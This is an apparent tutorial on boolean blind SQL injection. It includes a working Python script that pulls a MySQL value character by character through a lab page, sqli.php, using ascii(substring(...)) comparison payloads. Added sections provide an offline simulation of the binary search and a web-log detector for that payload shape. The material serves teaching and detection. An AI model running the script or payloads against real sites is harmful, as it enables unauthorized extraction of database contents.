General idea:
1. The mid value is the midpoint of left and right.
2. If mid equals left, go to step 5; otherwise send a request using mid.
3. If the page comes back correctly, assign mid to right and go back to step 1; if the page comes back with an error, go to step 4.
4. Assign mid to left and go back to step 1.
5. Return mid.
Because the interval halves on every request, this converges very quickly: a single character can generally be recovered within 10 requests.
Create a database table first:
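To make the step list concrete, the following is an added offline simulation (not the script from this page) that runs the same search against a constructed in-memory oracle standing in for the vulnerable page. It counts how many yes/no answers each character costs, which is the figure that matters for both the "within 10 requests" claim and for what a defender sees as a burst of near-identical requests. SECRET (the same string as the INSERT below), Oracle, binary_search_char, recover and max_queries are names chosen here.

```python
import math

# Constructed stand-in for the value stored in table b (same string as the INSERT on this page).
SECRET = "aaaaaaaaaabbbbbbbbbcccccccccddddddddddfffffggggggggggggggggg"


class Oracle:
    """In-memory stand-in for the vulnerable page: answers only the one yes/no
    question a boolean blind injection can ask, and counts how often it is asked."""

    def __init__(self, secret):
        self.secret = secret
        self.queries = 0

    def char_below(self, index, mid):
        # MySQL SUBSTRING is 1-based; past the end it yields '' and ASCII('') is 0,
        # so positions past the value collapse to the lower bound 35 and print '#'.
        self.queries += 1
        code = ord(self.secret[index - 1]) if index <= len(self.secret) else 0
        return code < mid


def binary_search_char(oracle, index, left=35, right=127):
    """Steps 1-5 from the text: keep the invariant left <= code < right until it collapses."""
    while True:
        mid = (left + right) // 2          # step 1
        if mid == left:                    # step 2: interval is one wide, answer found
            return chr(mid)                # step 5
        if oracle.char_below(index, mid):  # step 3: "correct" page means code < mid
            right = mid
        else:                              # step 4: "error" page means code >= mid
            left = mid


def recover(oracle, length):
    """Recover `length` positions and report the oracle queries spent on each."""
    chars, per_char = [], []
    for i in range(1, length + 1):
        before = oracle.queries
        chars.append(binary_search_char(oracle, i))
        per_char.append(oracle.queries - before)
    return "".join(chars), per_char


def max_queries(left=35, right=127):
    """Worst case for one character: ceil(log2(width of the starting interval))."""
    return math.ceil(math.log2(right - left))


if __name__ == "__main__":
    o = Oracle(SECRET)
    value, counts = recover(o, len(SECRET))
    print(value, "max per char:", max(counts), "bound:", max_queries())
```

With the starting interval [35, 127) the worst case is ceil(log2(92)) = 7 answers per character, well under the 10 quoted above. Two edge cases follow from the same invariant: any character below 35 (space, `!`, `"`) is reported as `#` just like positions past the end of the value, so a result full of `#` is the sign that the interval, not the search, is wrong.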
mysql> CREATE TABLE a(id INT,content VARCHAR(20));
Query OK, 0 rows affected (0.20 sec)

mysql> CREATE TABLE b(id INT,name VARCHAR(100));
Query OK, 0 rows affected (0.03 sec)

mysql> INSERT INTO a(id,content) VALUES(1,'test');
Query OK, 1 row affected (0.34 sec)

mysql> INSERT INTO b(id,name) VALUES(1,'aaaaaaaaaabbbbbbbbbcccccccccddddddddddfffffggggggggggggggggg');
Query OK, 1 row affected (0.03 sec)
Blind injection vulnerable PHP code
Use Code
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys, urllib2
from optparse import OptionParser
from urllib2 import Request, urlopen, URLError, HTTPError
import urllib


def request(URL):
    # Fetch one page; exit on HTTP or connection errors
    user_agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, user_agent)
    try:
        resp = urllib2.urlopen(req)
    except HTTPError, e:
        print('[!] The server couldn\'t fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
    return resp.read()


def binary_sqli(left, right, index):
    # Binary search for the ASCII code of character `index` (steps 1-5 above)
    host = '192.168.204.129'
    while 1:
        mid = (left + right) / 2
        if mid == left:           # interval collapsed: left is the character
            print chr(mid)
            break
        payload = '1 and ascii(substring((SELECT name from b),%s,1))<%s' % (str(index), mid)
        param = {'sqli': payload}
        html = request('http://' + host + '/sqli.php?' + urllib.urlencode(param))
        if 'True' in html:        # page returned correctly: code < mid
            right = mid
        else:                     # page returned error: code >= mid
            left = mid


if __name__ == '__main__':
    for i in range(1, 50):
        binary_sqli(35, 127, i)
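On the receiving side, the same search leaves a recognisable trace in the web server log: one client hitting one path several times within seconds, each query string carrying an ASCII/SUBSTRING comparison whose numeric bound moves. The detector below is an added example (not part of this page) that parses constructed combined-format log lines, decodes the query string and raises one alert per client/path pair once the burst exceeds a threshold inside a time window. The sample lines, LOG_RE, PAYLOAD_RE, BOUND_RE, parse_line and detect are all names and data chosen here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, quote_plus, urlsplit

# Apache/nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# The probe shape used on this page: ASCII(SUBSTRING(...)) compared against a number.
PAYLOAD_RE = re.compile(r"ascii\s*\(\s*substring\s*\(", re.IGNORECASE)
BOUND_RE = re.compile(r"[<>]=?\s*(\d+)")


def _line(ip, second, query):
    """Build one constructed log line (sample data, not real traffic)."""
    return (f'{ip} - - [10/Oct/2023:13:55:{second:02d} +0000] '
            f'"GET /sqli.php?{query} HTTP/1.1" 200 512 "-" "Mozilla/5.0"')


# Constructed sample: one benign request, then the seven probes a binary search
# for a single character sends (bounds 81,104,92,98,95,96,97 converge on 'a'), then
# another benign request from a different client.
SAMPLE_LOG = "\n".join(
    [_line("192.168.204.1", 36, "sqli=1")]
    + [_line("192.168.204.130", 40 + n,
             "sqli=" + quote_plus(f"1 and ascii(substring((SELECT name from b),1,1))<{mid}"))
       for n, mid in enumerate([81, 104, 92, 98, 95, 96, 97])]
    + [_line("192.168.204.2", 50, "sqli=2")]
)


def parse_line(line):
    """Return ip, path, timestamp and the numeric bound of a probe (bound is None if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    bound = None
    for values in parse_qs(url.query).values():     # parse_qs URL-decodes each value
        for v in values:
            if PAYLOAD_RE.search(v):
                b = BOUND_RE.search(v)
                bound = int(b.group(1)) if b else -1   # -1: probe without a numeric bound
    return {
        "ip": m.group("ip"),
        "path": url.path,
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "bound": bound,
    }


def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Alert on (client, path) pairs with at least `threshold` probes inside one window."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["bound"] is not None:
            probes[(rec["ip"], rec["path"])].append(rec)
    alerts = []
    for (ip, path), recs in probes.items():
        recs.sort(key=lambda r: r["ts"])
        if len(recs) >= threshold and recs[-1]["ts"] - recs[0]["ts"] <= window:
            alerts.append({"ip": ip, "path": path, "count": len(recs),
                           "bounds": [r["bound"] for r in recs]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The threshold of 5 sits below the 7 probes one character costs, so a single recovered character already trips the rule while an isolated scanner request does not. The rule is signature-based on the ASCII/SUBSTRING shape, so it should be paired with a plain rate rule on the same path (many requests from one client differing only in the query string) to cover probes written with other SQL syntax.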